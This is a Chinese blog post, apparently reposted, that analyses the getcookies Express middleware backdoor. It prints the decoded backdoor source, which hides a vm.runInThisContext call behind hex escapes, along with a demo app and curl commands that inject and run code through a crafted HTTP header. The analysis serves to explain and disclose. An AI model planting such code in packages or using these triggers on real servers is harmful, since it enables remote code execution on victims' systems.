Express 中間件 getcookies 後門代碼分析
前段時間 Express 中的一箇中間件 getcookies 被爆出存在 backdoor,關注了一波,但僅看官方npm 的解釋,一時半會兒沒想明白黑客是怎麼留的後門,一直困擾着我。今天有空仔細看了一下,瞭解了黑客具體的做案手段。文中的代碼能夠在 drafts/getcookies 中查找。html
原文連接node
後門代碼分析
這個後門代碼找得也不容易,由於在被爆出後門後,npm 團隊第一時間就刪除下架了,github 上的倉庫也沒找到,不過不負有心人,在 npm.runkit 中找到了後門源碼。git
- 黑客巧妙地把 backdoor 代碼假裝成測試代碼放在 test 目錄中,並在 index.js 「不經意」 引入了測試代碼
- 主要的
require('vm')['runInThisContext']代碼被編碼故意假裝了一下 - 全程使用 16 進制,讓不想細看的人覺得是測試代碼
// 分配一塊 64K 的內存
module.exports.log = module.exports.log || Buffer.alloc(0xffff);
// gCOMMANDhDATAi
JSON.stringify(req.headers).replace(/g([a-f0-9]{4})h((?:[a-f0-9]{2})+)i/gi, (o, p, v) => {
// 以 0xfffe 命令爲樣例
// 將字符串 feff 讀入 Buffer
// 'feff' => <Buffer fe ff>
// readUInt16LE 讀取 16 bit(位) 並以 byte(字節) 反向排序
// <Buffer fe ff> => 0xfffe
//
// > Buffer.from('feff', 'hex').readUInt16LE(0) === 0xfffe
// true
// > Buffer.from('1234567890', 'hex').readUInt32LE(1).toString(16)
// '90785634'
p = Buffer.from(p, 'hex').readUInt16LE(0);
switch (p) {
case 0xfffe:
module.exports.log = Buffer.alloc(0xffff);
return;
case 0xfffa:
return setTimeout(() => {
// 去除末尾的 0x00
let c = module.exports.log.toString().replace(/\x00*$/, '');
module.exports.log = Buffer.alloc(0xffff);
// 不能以 0x00 開頭
if (c.indexOf('\x00') < 0) {
// require('vm')['runInThisContext'](c)(module.exports, require, req, res, next)
// 代碼必須是個函數
require('\x76\x6d')['\x72\x75\x6e\x49\x6e\x54\x68\x69\x73\x43\x6f\x6e\x74\x65\x78\x74'](c)(module.exports, require, req, res, next);
}
next();
}, 1000);
default:
// 咱們以 (function(){console.log('hack')}) 爲例
v = Buffer.from(v, 'hex');
for (let i = 0; i < v.length; i++) {
// 由於執行命令的時候,不能以 0x00 開頭
// 因此,p 必須是 0x0000
module.exports.log[p + i] = v[i];
}
}
});
複製代碼
測試一下後門
寫一個 express 應用,並將中間件引入進來github
var express = require('express')
var app = express()
var getcookies = require('..');
app.use(getcookies);
app.get('/', function (req, res) {
res.send('Hello World')
})
app.listen(3000)
複製代碼
啓動並執行咱們的後門代碼express
$ node demo/index.js
// 向服務器注入 16 進制代碼 (function(){console.log('hack')})
$ curl -H 'evil: g0000h2866756e6374696f6e28297b636f6e736f6c652e6c6f6728276861636b27297d29i' http://127.0.0.1:3000
// 向服務器發送執行命令
$ curl -H 'evil: gfaffh00i' http://127.0.0.1:3000
複製代碼
注意,中途出現的 hack 就是被注入代碼的輸出。npm
References
相關文章
- 1. express中間件
- 2. Express中間件-01: 入門
- 3. express 中間件
- 4. Express 中間件 body-parser 原理分析
- 5. Express--中間件
- 6. express中間件實現原理和源碼分析
- 7. express-13 中間件
- 8. Express中間件--express-session
- 9. 理解Express中間件
- 10. nodejs入門之Express 中間件
- 更多相關文章...
- • Markdown 代碼 - Markdown 教程
- • Eclipse 代碼模板 - Eclipse 教程
- • IntelliJ IDEA安裝代碼格式化插件
- • Scala 中文亂碼解決
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章